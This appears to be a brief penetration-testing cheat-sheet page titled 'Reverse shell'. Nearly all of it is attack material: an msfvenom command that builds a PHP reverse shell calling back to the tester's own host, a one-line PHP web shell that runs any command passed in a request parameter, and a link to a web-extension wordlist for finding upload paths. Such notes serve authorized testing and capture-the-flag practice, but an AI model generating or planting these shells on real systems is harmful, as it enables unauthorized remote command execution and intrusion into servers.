# Reverse shell

```
// use msfvenom to generate reverse shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php

simple php shell
<?php system($_REQUEST['cmd']); ?>

web extensions
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/web-extensions.txt

```

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FLKsywIUvFvw8W9kmmYt5%2Fimage.png?alt=media\&token=4e022f33-f167-423b-be2f-baec759178f5)

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2Fbsm40C8SuUq1qD8u2VmY%2Fimage.png?alt=media\&token=b2617e1d-2466-4bc1-b85e-ceb0caf4023f)